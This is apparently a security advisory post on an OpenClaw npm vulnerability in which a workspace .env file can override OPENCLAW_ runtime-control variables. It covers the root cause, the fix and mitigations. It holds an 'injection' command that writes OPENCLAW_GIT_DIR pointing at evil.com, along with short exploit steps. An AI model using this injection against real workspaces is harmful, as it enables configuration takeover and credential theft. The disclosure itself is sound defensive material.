Listen to this Post
The vulnerability exists because the workspace `.env` loading mechanism failed to adequately reserve the `OPENCLAW_` runtime-control namespace. In vulnerable versions (prior to 2026.4.20), the `src/infra/dotenv.ts` module loads environment variables from a `.env` file in the current working directory before applying the secure host-enforced policies. This early loading allows an attacker who controls the workspace to place a malicious `.env` file containing variables such as OPENCLAW_GIT_DIR. When OpenClaw executes operations like source-update or installer flows that depend on these runtime-control variables, it reads the overridden values from the workspace `.env` instead of using the intended trusted values. The root cause is a missing guardrail in the denylist: `src/infra/dotenv.ts` blocked only a narrow set of named variables and generic suffixes like _API_HOST, leaving critical connector-specific environment variables unblocked. Consequently, the loading order prioritizes the untrusted workspace `.env` over the trusted state-dir configuration, effectively bypassing OpenClaw’s environment policy. The impact is that an attacker can redirect trusted runtime behavior, alter configuration paths, and potentially redirect credentials or sensitive data to an infrastructure they control. The fix ensures that the workspace dotenv loader rejects all entries that fall under the `OPENCLAW_` runtime-control namespace, thereby isolating workspace-sourced variables from system-critical runtime settings. The fix has been committed as commit 018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6.
Platform: npm package
Version: < 2026.4.20
Vulnerability : Workspace .env runtime-control override
Severity: Medium
date: Apr 21 2026
Prediction: Apr 25 2026
What Undercode Say:
Check for malicious `.env` in current directory:
ls -la .env
Simulate injection attempt:
echo "OPENCLAW_GIT_DIR=https://evil.com/repo" > .env
If running an affected version (< 2026.4.20), the variable will be loaded.
Exploit:
- Clone an attacker‑controlled repository containing a crafted `.env` with `OPENCLAW_GIT_DIR=…` (or other `OPENCLAW_` runtime‑control vars).
- Run OpenClaw from that workspace directory.
- The malicious `.env` is loaded before the runtime‑control namespace is reserved, overriding trusted settings and steering runtime behavior.
Protection from this CVE:
- Upgrade to OpenClaw ≥ 2026.4.20.
- Do not run OpenClaw in untrusted directories or from unverified workspaces.
- Remove or strictly monitor `.env` files in workspace roots if an immediate upgrade is not possible.
Impact:
- Redirection of trusted runtime behavior (e.g., `OPENCLAW_GIT_DIR` pointing to an attacker‑controlled repository).
- Potential credential theft or exposure if connector endpoint variables are overridden.
- Stealthy configuration takeover without explicit user awareness.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
